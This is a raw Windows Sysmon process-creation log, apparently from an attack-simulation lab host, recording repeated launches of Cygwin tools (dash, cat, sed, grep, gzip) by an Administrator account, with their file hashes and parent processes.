14:55:55.616{A8622C2F-53FB-6078-2209-00000000AE01}5404C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048766Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.607{A8622C2F-53FB-6078-2109-00000000AE01}6672C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-2009-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048756Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.600{A8622C2F-53FB-6078-2009-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048744Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.592{A8622C2F-53FB-6078-1F09-00000000AE01}5828C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-1D09-00000000AE01}5052C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048726Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.585{A8622C2F-53FB-6078-1E09-00000000AE01}1140C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-1B09-00000000AE01}4300C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048724Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.584{A8622C2F-53FB-6078-1D09-00000000AE01}5052C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048706Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.577{A8622C2F-53FB-6078-1C09-00000000AE01}5108C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-1A09-00000000AE01}1408C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.577{A8622C2F-53FB-6078-1B09-00000000AE01}4300C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048692Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.570{A8622C2F-53FB-6078-1A09-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048680Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.562{A8622C2F-53FB-6078-1909-00000000AE01}3176C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-1809-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048670Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.555{A8622C2F-53FB-6078-1809-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048658Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.547{A8622C2F-53FB-6078-1709-00000000AE01}5640C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-1509-00000000AE01}5996C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048639Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.540{A8622C2F-53FB-6078-1609-00000000AE01}6084C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-1309-00000000AE01}6196C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048637Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.539{A8622C2F-53FB-6078-1509-00000000AE01}5996C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048619Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.532{A8622C2F-53FB-6078-1409-00000000AE01}6592C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-1209-00000000AE01}6852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048617Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.532{A8622C2F-53FB-6078-1309-00000000AE01}6196C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048605Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.524{A8622C2F-53FB-6078-1209-00000000AE01}6852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048593Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.516{A8622C2F-53FB-6078-1109-00000000AE01}4056C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-1009-00000000AE01}1476C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048583Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.509{A8622C2F-53FB-6078-1009-00000000AE01}1476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048570Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.501{A8622C2F-53FB-6078-0F09-00000000AE01}1612C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-0D09-00000000AE01}1156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048552Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.493{A8622C2F-53FB-6078-0E09-00000000AE01}4832C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-0B09-00000000AE01}3912C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048550Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.493{A8622C2F-53FB-6078-0D09-00000000AE01}1156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.486{A8622C2F-53FB-6078-0C09-00000000AE01}2408C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-0A09-00000000AE01}5220C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048530Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.486{A8622C2F-53FB-6078-0B09-00000000AE01}3912C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048518Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.479{A8622C2F-53FB-6078-0A09-00000000AE01}5220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.471{A8622C2F-53FB-6078-0909-00000000AE01}3008C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-0809-00000000AE01}4568C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048495Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.462{A8622C2F-53FB-6078-0809-00000000AE01}4568C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048483Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.454{A8622C2F-53FB-6078-0709-00000000AE01}6808C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-0509-00000000AE01}1408C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048464Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.446{A8622C2F-53FB-6078-0509-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048463Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.446{A8622C2F-53FB-6078-0609-00000000AE01}5776C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-0309-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048445Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.439{A8622C2F-53FB-6078-0409-00000000AE01}5628C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-0209-00000000AE01}5640C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048443Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.439{A8622C2F-53FB-6078-0309-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048431Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.432{A8622C2F-53FB-6078-0209-00000000AE01}5640C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.424{A8622C2F-53FB-6078-0109-00000000AE01}6580C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-0009-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.417{A8622C2F-53FB-6078-0009-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048395Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.408{A8622C2F-53FB-6078-FF08-00000000AE01}3368C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-FD08-00000000AE01}5344C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048378Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.401{A8622C2F-53FB-6078-FE08-00000000AE01}5224C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-FB08-00000000AE01}1800C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048376Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.401{A8622C2F-53FB-6078-FD08-00000000AE01}5344C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.394{A8622C2F-53FB-6078-FC08-00000000AE01}5620C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-FA08-00000000AE01}5212C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048356Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.394{A8622C2F-53FB-6078-FB08-00000000AE01}1800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048344Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.387{A8622C2F-53FB-6078-FA08-00000000AE01}5212C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048332Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.379{A8622C2F-53FB-6078-F908-00000000AE01}3300C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-F808-00000000AE01}6064C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048322Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 